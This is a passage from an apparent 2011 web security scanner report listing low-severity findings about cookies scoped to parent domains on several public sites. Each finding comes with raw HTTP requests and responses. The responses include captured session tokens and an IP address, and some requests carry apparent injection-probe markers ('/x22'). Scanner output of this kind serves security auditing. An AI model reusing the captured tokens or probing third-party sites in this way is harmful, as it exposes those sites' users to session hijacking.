Date: Thu, 03 Feb 2011 20:28:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-UA-Compatible: IE=EmulateIE8
Vary: Accept-Encoding
Set-Cookie: tcc=one; path=/
Set-Cookie: abtest_v=version&7&site_wide&claimbutton.control; path=/
Set-Cookie: member_session=UmFuZG9tSVZDXysA%5BS%5DCWsGpZJaj0sDqAt3Qj8AAoQFPbOBf7rrCY6lYGPtsEyTlueYzU4Ng64mj5DmsgbfcWNKrZGp6UV3Ll5u5Muh5b8JEtFGe%5BP%5DaEKWvw65AHkGWteILjBVuFz1jjWqjy7LZBTvEvbx5XbZZF03hS7b9DVF6ff%5BS%5DlZoIt%5BS%5Drr3OPqRmO5DeRFflwRyOUZWc5e4K62A7xN6lkweT2Glj9fUIgXkFAVckBCEgTy7H%5BP%5DluqEDQwHIte54Cei0DtflweKRv6pQGPHbAKA%5BE%5D%5BE%5D; domain=.manta.com; path=/; expires=Sat, 05-Mar-2011 20:28:16 GMT
Set-Cookie: refer_id=0000; domain=.manta.com; path=/
Set-Cookie: refer_id_persistent=0000; domain=.manta.com; path=/; expires=Sat, 02-Feb-2013 20:28:16 GMT
Set-Cookie: cust_id=1296764896.830343-519; domain=.manta.com; path=/; expires=Sat, 02-Feb-2013 20:28:16 GMT
Via: 1.0 www.manta.com
Content-Length: 52215
X-Varnish: 1847049511
Via: 1.1 varnish
X-Served-By: ecnext43
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <title>A B C Development
...[SNIP]...

12.4. http://www.manta.com/c/mm8136k/abc-development-inc/x22  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.manta.com
Path:   /c/mm8136k/abc-development-inc/x22

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c/mm8136k/abc-development-inc/x22 HTTP/1.1
Host: www.manta.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 03 Feb 2011 20:28:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-UA-Compatible: IE=EmulateIE8
Vary: Accept-Encoding
Set-Cookie: tcc=one; path=/
Set-Cookie: abtest_v=version&7&site_wide&adsenseurl.i; path=/
Set-Cookie: member_session=UmFuZG9tSVal7bOT1aWDpS%5BS%5DYHa5elnas1i8FyBu96eHtVxkOzSTAkYqzjbSyN6kyrcEkolEXnIov%5BP%5DNQYJYwp%5BS%5DMR6GmN4JVJGCLWShxUnyRxM1JKLnGsJd%5BP%5DpEQmd2FxR9dBmv0oSQZzlWRLhK63xHsXj2od2mdXI9abrzBxwNryHqU4tFdM5CCpZcqKp53DjBiaE0oTZl76SyA%5BP%5DVWmV%5BP%5Dl6bCbl6JiVFizfhvyNBHxuZJB7Ei7%5BP%5DhAk2cupNjp84JqLXZhVliop9Z5T9YZqAvHxiw%5BE%5D%5BE%5D; domain=.manta.com; path=/; expires=Sat, 05-Mar-2011 20:28:14 GMT
Set-Cookie: refer_id=0000; domain=.manta.com; path=/
Set-Cookie: refer_id_persistent=0000; domain=.manta.com; path=/; expires=Sat, 02-Feb-2013 20:28:14 GMT
Set-Cookie: cust_id=1296764894.813410-573; domain=.manta.com; path=/; expires=Sat, 02-Feb-2013 20:28:14 GMT
Via: 1.0 www.manta.com
Content-Length: 52971
X-Varnish: 1811565262
Via: 1.1 varnish
X-Served-By: ecnext42
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <title>Abc Development In
...[SNIP]...

12.5. http://www.myspace.com/Modules/PostTo/Pages/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.myspace.com
Path:   /Modules/PostTo/Pages/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Modules/PostTo/Pages/ HTTP/1.1
Host: www.myspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Location: /auth/loginform?dest=http%3a%2f%2fwww.myspace.com%2fModules%2fPostTo%2fPages%2fdefault.aspx%3fu%3dhttp%253a%252f%252fwww.myspace.com
Server: Microsoft-IIS/7.5
X-Server: a75443ca96a96accee61950d37c435b044c975c23a7cdb7c
Set-Cookie: MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634323385473346510&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==&UserFirstVisit=1; domain=.myspace.com; expires=Thu, 10-Feb-2011 22:02:27 GMT; path=/
Set-Cookie: SessionDDF2=y8IXJD/nhFg8Hw3in+CePVubrzbp787no8iQd5WyjJmDU8u2Oci0NbxppyV+nx3McnZwURY4gt2l9khMgq/WlQ==; domain=.myspace.com; expires=Mon, 03-Feb-2031 22:02:27 GMT; path=/
X-AspNet-Version: 4.0.30319
X-PoweredBy: Pimple Faced Geeks
Date: Thu, 03 Feb 2011 22:02:27 GMT
Content-Length: 249
X-Vertical: integrationframework

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/auth/loginform?dest=http%3a%2f%2fwww.myspace.com%2fModules%2fPostTo%2fPages%2fdefault.aspx%3fu%3dhttp%253a%252f%252f
...[SNIP]...

12.6. http://www.opensource.org/licenses/mit-license.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:21:04 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.15
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=6511c3d78eq0k3q224uiic1f03; expires=Sat, 26-Feb-2011 22:54:24 GMT; path=/; domain=.opensource.org
Last-Modified: Thu, 03 Feb 2011 19:16:24 GMT
ETag: "61d277c2c3aa0a9af5e36cf0f001eba2"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

12.7. http://www.overstock.com/productxml/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.overstock.com
Path:   /productxml/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /productxml/?QuickList=1&ProductURL=Y&ShortName=Y&keywords=12370379&ThumbnailURL=Y HTTP/1.1
Host: www.overstock.com
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1787227/3-inBannerVideo2011_ViPrPf_New.swf?clickTag=http%3A%2F%2Fad.doubleclick.net%2Fclick%253Bh%253Dv8%2F3aa3%2F3%2F0%2F%252a%2Ff%253B234670317%253B0-0%253B0%253B58524542%253B4307-300%2F250%253B40113270%2F40131057%2F2%253Bu%253D%252Clb-1482036_1296770433%252C11d765b6a10b1b3%252Cnone%252Can.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1%253B%257Efdr%253D234572024%253B0-0%253B0%253B32934908%253B4307-300%2F250%253B40173662%2F40191449%2F1%253Bu%253D%252Clb-1482036_1296770433%252C11d765b6a10b1b3%252Cnone%252Can.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1%253B%257Esscs%253D%253f&xmlFile=InBannerVideo_ViPrPf_LongboardVA_ronQ1.xml&taxonomyId=2&taxonomyType=sto&productCID=654321&keywords=&skus=12370379|12958970|11254000|12370390|10927901|11915556|13002490|10738953|12970899|12532546|12130097|12753446|11551645|066987|11144650|10355113|13197342|12941235|12370383|12978335|12453900
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:00:38 GMT
Server: Apache
Set-Cookie: SSLB=B; path=/; domain=www.overstock.com; expires=Fri, 04-Feb-2011 06:00:38 GMT
Expires: Thu, 03 Feb 2011 22:00:38 GMT
Pragma: no-cache
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110203; Domain=.overstock.com; Expires=Fri, 03-Feb-2012 22:00:38 GMT; Path=/
Set-Cookie: ostk_aggr_session=sessstrt^1296770438500|csbshow^0; Domain=.overstock.com; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1296770438501; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; Domain=.overstock.com; Expires=Fri, 03-Feb-2012 22:00:38 GMT; Path=/
Set-Cookie: mxcsurftype=2; Domain=.overstock.com; Path=/
Set-Cookie: clubogiftcards=clubogctotal^0.00; Domain=.overstock.com; Path=/
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/xml;charset=ISO-8859-1
Content-Length: 982

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<OSTKXML xsi:schemaLocation="http://www.overstock.com/productxml/o1/ProductXmlPage.xsd" xmlns="http://www.overstock.com/productxml/o1" xmlns:xsi
...[SNIP]...

12.8. http://www.stumbleupon.com/submit  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.stumbleupon.com
Path:   /submit

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /submit HTTP/1.1
Host: www.stumbleupon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: PHPSESSID=37svlldgsf347c7s87vtp7eur6; path=/; domain=.stumbleupon.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: cmf_i=7201754904d4b1ced1c53d1.18537805; expires=Sat, 05-Mar-2011 21:23:57 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: cmf_spr=A%2FN; expires=Sat, 05-Mar-2011 21:23:57 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2Fsubmit; expires=Sat, 05-Mar-2011 21:23:57 GMT; path=/; domain=.stumbleupon.com
Set-Cookie: su_c=e47999cdfca3ca02d942318b09c2ef89%7C%7C10%7C%7C1296768237%7C6c3c55f74134ae4c580f9262aa023fd3; expires=Sun, 31-Jan-2021 21:23:57 GMT; path=/; domain=.stumbleupon.com
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Content-Length: 7306
Date: Thu, 03 Feb 2011 21:23:57 GMT
X-Varnish: 20282270
Age: 0
Via: 1.1 varnish
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www
...[SNIP]...

12.9. http://www.veoh.com/webplayed.xml  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.veoh.com
Path:   /webplayed.xml

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webplayed.xml?action=PlayerLoaded&videoSequence=1&userWhoEmbedded=anonymous&playSequence=0&collectionId=&autoPlay=true&percent=&playerVersion=flash/VeohPlayer-Freewheel.7.0.0.40&player=videodetails&inVeoh=true&flashVersion=WIN%2010,1,103,20&affiliateId=&cachebuster=0.22769851004704833&apiId=0E13378F-874E-DB67-3E0B-113A55BC57F9&positionTime=0&volumeLevel=NaN&totalVideos=1&truncated=false&videoId=18978294&idSource=veoh&bufferStateEntered=0&userTime=2.565&playTime=0&bufferTime=0&stopTime=2.565&pauseTime=0&playerSessionID=e5df0bf7-4865-174d-7ab5-b481ea4a57e3&client=false HTTP/1.1
Host: www.veoh.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utmv=; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __utmb=91933981.1.10.1296766388; vvt="1&Fri, 04 Feb 2011 20:53:09 GMT"; __qca=P0-1750536792-1296766390251; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; JSESSIONID=FA513D5C45F8F3409631CA9302C4270B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-HOST: appsrv-api16.els1.veoh.com
Set-Cookie: veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; Domain=.veoh.com; Path=/
Content-Type: text/xml;charset=utf-8
Content-Language: en-US
Content-Length: 94
Date: Thu, 03 Feb 2011 20:52:32 GMT


<Response>
   <Result>0</Result>
   <ErrorText></ErrorText>
</Response>

12.10. http://102.xg4ken.com/media/redir.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://102.xg4ken.com
Path:   /media/redir.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /media/redir.php?prof=88&camp=4679&affcode=cr197235&cid=7085856551|166328|SmartDraw&mType=e&networkType=search&url[]=http%3A%2F%2Finfo.mindjet.com%2FMindManagerB.html%3Fcmpg%3DAmericas_-_Google_US_Competitors/x22 HTTP/1.1
Host: 102.xg4ken.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Thu, 03 Feb 2011 20:31:19 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=6de8bdeb-6bd9-2909-a31c-000018710444; expires=Wed, 04-May-2011 20:31:19 GMT; path=/; domain=.xg4ken.com
Location: http://info.mindjet.com/MindManagerB.html?cmpg=Americas_-_Google_US_Competitors/x22
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


12.11. http://2e76.v.fwmrm.net/ad/l/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://2e76.v.fwmrm.net
Path:   /ad/l/1

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad/l/1?metr=127&ct=5&et=i&cn=firstQuartile&s=c110&t=129676725240202813&adid=249349&reid=123864&arid=0&iw=&uxnw=11894&uxss=sg11948&uxct=1 HTTP/1.1
Host: 2e76.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cph="1295039779.438.1.1,"; _cvr="1296076529^11575^sg11951~sg11611^0~0^2206.000000~0.000000,"; _pr="1296076540.8163.209169~209170~,1296076434.7120.209169~209170~,1296076334.4450.209169~209170~,1296076263.3972.209169~209170~,1296076138.3959.209169~209170~,1296076027.4830.209169~209170~,1296075922.4171.209169~209170~,1296075822.3611.209169~209170~,1296075754.4614.209169~209170~,1296075621.9008.209169~209170~,1296075510.8419.209169~209170~,1296075405.9586.209169~209170~,1296075304.8942.209169~209170~,1296075235.1965.209169~209170~,1296075101.798.209169~209170~,1296074990.1228.209169~209170~,1296074859.104.209169~209170~,1296074758.1162.209169~209170~,1296074642.5926.209169~209170~,1296074515.1669.209169~209170~,1296074405.2652.209169~209170~,1296074299.7276.209169~209170~,1296074199.8486.209169~209170~,1296074130.5588.209169~209170~,1296074005.5439.209169~209170~,1296073893.9848.209169~209170~,1296073785.9641.209169~209170~,1296073682.7603.209169~209170~,1296073611.6354.209169~209170~,1296073486.2138.209169~209170~,1296073374.8594.209169~209170~,1296073267.5235.209169~209170~,1296073166.3153.209169~209170~,1296073098.1567.209169~209170~,1296072968.5610.209169~209170~,"; NSC_okcbewjq1.gxnsn.ofu=ffffffff09091c3945525d5f4f58455e445a4a423209; _sid="c110_5569572937864193463"; _uid="a104_5562153497824379009"; _auv="g12288~1.1296767255.0,12720.1296767255.0,^"; _vr="1296767252.0+7564699552021921.248599~249349~331220~,"; _sc="sg12288.1296767252.1296767255.28800.0.0,"; _wr="g12288"

Response

HTTP/1.1 200 OK
Set-Cookie: _uid="a104_5562153497824379009";expires=Fri, 03 Feb 2012 21:07:44 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _auv="g12288~1.1296767264.0,12720.1296767264.0,^";expires=Sat, 05 Mar 2011 21:07:44 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _cvr="1296767264^11894^sg12288~sg11948^0~0^0.000000~5.000000,";expires=Sat, 05 Mar 2011 21:07:44 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _vr="1296767252.0+7564699552021921.248599~249349~331220~,";expires=Sat, 05 Mar 2011 21:07:44 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg12288.1296767252.1296767264.28800.0.5,";expires=Sat, 05 Mar 2011 21:07:44 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g12288";expires=Sat, 05 Mar 2011 21:07:44 GMT;domain=.fwmrm.net;path=/;
Content-Type: text/html
Content-Length: 0
Pragma: no-cache
Date: Thu, 03 Feb 2011 21:07:43 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"


12.12. http://2e76.v.fwmrm.net/ad/p/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://2e76.v.fwmrm.net
Path:   /ad/p/1

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /ad/p/1? HTTP/1.1
Host: 2e76.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
content-type: text/xml
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cph="1295039779.438.1.1,"; _vr="1295482435..60536~60671~66149~103579~170504~173095~306401~,"; _uid="a104_5562153497824379009"; _wr="g11951"; _auv="g11951~5.1296076541.0,12670.1296075237.880,12671.1296076541.0,^"; _cvr="1296076529^11575^sg11951~sg11611^0~0^2206.000000~0.000000,"; _pr="1296076540.8163.209169~209170~,1296076434.7120.209169~209170~,1296076334.4450.209169~209170~,1296076263.3972.209169~209170~,1296076138.3959.209169~209170~,1296076027.4830.209169~209170~,1296075922.4171.209169~209170~,1296075822.3611.209169~209170~,1296075754.4614.209169~209170~,1296075621.9008.209169~209170~,1296075510.8419.209169~209170~,1296075405.9586.209169~209170~,1296075304.8942.209169~209170~,1296075235.1965.209169~209170~,1296075101.798.209169~209170~,1296074990.1228.209169~209170~,1296074859.104.209169~209170~,1296074758.1162.209169~209170~,1296074642.5926.209169~209170~,1296074515.1669.209169~209170~,1296074405.2652.209169~209170~,1296074299.7276.209169~209170~,1296074199.8486.209169~209170~,1296074130.5588.209169~209170~,1296074005.5439.209169~209170~,1296073893.9848.209169~209170~,1296073785.9641.209169~209170~,1296073682.7603.209169~209170~,1296073611.6354.209169~209170~,1296073486.2138.209169~209170~,1296073374.8594.209169~209170~,1296073267.5235.209169~209170~,1296073166.3153.209169~209170~,1296073098.1567.209169~209170~,1296072968.5610.209169~209170~,"; _sc="sg11951.1296072535.1296076541.28800.2377.0,"; NSC_okcbewjq1.gxnsn.ofu=ffffffff09091c3945525d5f4f58455e445a4a423209
Content-Length: 3345

<adRequest profile="11894:Veoh_Live" version="1" networkId="11894"><customDistributor /><capabilities><supportsSlotTemplate /><explicitVideoTracking /><expectMultipleCreativeRenditions /><supportsAdUn
...[SNIP]...

Response

HTTP/1.1 200 OK
Set-Cookie: _sid="c110_5569572937864193463";domain=.fwmrm.net;path=/;
Set-Cookie: _uid="a104_5562153497824379009";expires=Fri, 03 Feb 2012 21:07:32 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _vr="1296767252.0+7564699552021921.248599~249349~331220~,";expires=Sat, 05 Mar 2011 21:07:32 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg12288.1296767252.1296767252.28800.0.0,";expires=Sat, 05 Mar 2011 21:07:32 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g12288";expires=Sat, 05 Mar 2011 21:07:32 GMT;domain=.fwmrm.net;path=/;
X-FW-Power-By: Smart
Content-Type: text/xml
Pragma: no-cache
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:07:31 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"
Content-Length: 12774

<adResponse version='1'><rendererManifest version='1'>&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;
&lt;adRenderers version=&apos;1&apos;&gt;&lt;adRenderer adUnit=&apos;video,&apos;
...[SNIP]...

12.13. http://abcnews.go.com/Sports/wireStory  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://abcnews.go.com
Path:   /Sports/wireStory

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Sports/wireStory HTTP/1.1
Host: abcnews.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:31:26 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc05
X-Powered-By: ASP.NET
Set-Cookie: SWID=B93EDC68-F596-4509-B1FC-2C48F519C999; path=/; expires=Thu, 03-Feb-2031 20:31:23 GMT; domain=.go.com;
Content-Length: 7679
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">

<head>
<title>ABC
...[SNIP]...

12.14. http://ad.doubleclick.net/ad/N3671.msnmidfunnel.com/B5159652.21  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3671.msnmidfunnel.com/B5159652.21

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/N3671.msnmidfunnel.com/B5159652.21;sz=1x1;pc=%5BTPAS_ID%5D;ord=2013940297? HTTP/1.1
Accept: */*
Referer: http://www.msn.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ad.doubleclick.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Date: Fri, 04 Feb 2011 02:29:40 GMT
Location: http://s0.2mdn.net/viewad/998766/49-1x1.gif
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 04 Feb 2011 02:44:40 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Server: GFE/2.0
Content-Type: text/html


12.15. http://ad.doubleclick.net/ad/N6421.152847.MSN.COM/B5094800.20  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N6421.152847.MSN.COM/B5094800.20

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/N6421.152847.MSN.COM/B5094800.20;abr=!ie4;abr=!ie5;sz=1x1;ord=1362100664? HTTP/1.1
Accept: */*
Referer: http://www.msn.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ad.doubleclick.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 302 Found
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Fri, 04 Feb 2011 02:29:41 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Location: http://s0.2mdn.net/viewad/2850237/1x1.gif
Content-Type: image/gif
